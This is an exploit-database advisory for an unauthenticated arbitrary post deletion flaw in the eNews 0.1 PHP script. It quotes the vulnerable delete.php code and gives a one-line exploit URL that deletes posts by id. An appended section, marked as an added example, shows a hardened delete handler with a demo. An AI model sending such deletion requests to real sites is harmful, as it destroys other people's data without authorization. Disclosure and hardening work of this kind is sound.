- 18 Dec 2022
- EDB-ID: 5882
- EDB verification: Passed
- Author: ILKER KANDEMIR
- Vulnerability type: WEBAPPS
- Platform: PHP
- CVE: N/A
- Publication date: 2008-06-21
Code:
eNews 0.1 (delete.php) Arbitrary Delete Post Vulnerability
Author: iLker Kandemir [MEFISTO]
Script download : http://www.hotscripts.com/Detailed/81086.html
script demo : http://emvvy.com/demos/enews/
site : www.dumenci.net
----------------------------------------------------------------
//poc:
if ((isset($_GET['delete'])) && ($_GET['delete'] != "")) {
$deleteSQL = sprintf("DELETE FROM news WHERE id=%s",
GetSQLValueString($_GET['delete'], "int"));
----------------------------------------------------------------
//exploit :
http://[site]/delete.php?delete=[eNews_id]
----------------------------------------------------------------
tnx : aLL my FriEndZ
# milw0rm.com [2008-06-21]
- Source: www.exploit-db.com
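
The delete.php lines quoted in the advisory run the DELETE whenever the delete parameter is present, and nothing in those lines checks who sent the request. A hardened handler for the same news table, as an added example that is not eNews code or part of the original post; the session keys is_admin and csrf, the POST field names and the in-memory SQLite demo table are assumptions:

```php
<?php
// Added example, not eNews code. Assumed names: $session['is_admin'],
// $session['csrf'], POST fields 'delete' and 'csrf'.
declare(strict_types=1);

/** Decide whether a delete request may run; return the HTTP status to send. */
function handleDelete(PDO $db, string $method, array $post, array $session): int
{
    // 1. A state-changing action must not be reachable through a plain link (GET).
    if ($method !== 'POST') {
        return 405;
    }
    // 2. The caller must hold an authenticated administrator session.
    if (empty($session['is_admin'])) {
        return 403;
    }
    // 3. Per-session CSRF token, compared in constant time.
    $known = $session['csrf'] ?? '';
    $given = $post['csrf'] ?? '';
    if (!is_string($known) || !is_string($given) || $known === ''
        || !hash_equals($known, $given)) {
        return 403;
    }
    // 4. Accept only a positive integer id.
    $id = filter_var($post['delete'] ?? '', FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return 400;
    }
    // 5. Parameterised statement; report whether a row actually went away.
    $stmt = $db->prepare('DELETE FROM news WHERE id = :id');
    $stmt->execute([':id' => $id]);
    return $stmt->rowCount() === 1 ? 204 : 404;
}

// Constructed demo data: in-memory SQLite standing in for the news table.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO news (id, title) VALUES (1, 'first'), (2, 'second')");

$admin = ['is_admin' => true, 'csrf' => bin2hex(random_bytes(16))];
$cases = [                                   // method, POST body, session
    ['GET',  ['delete' => '1'], []],                             // link-style request
    ['POST', ['delete' => '1'], []],                             // no session
    ['POST', ['delete' => '1', 'csrf' => 'wrong'], $admin],      // bad token
    ['POST', ['delete' => '1', 'csrf' => $admin['csrf']], $admin],
];
foreach ($cases as [$method, $post, $session]) {
    echo $method, ' -> ', handleDelete($db, $method, $post, $session), PHP_EOL;
}
```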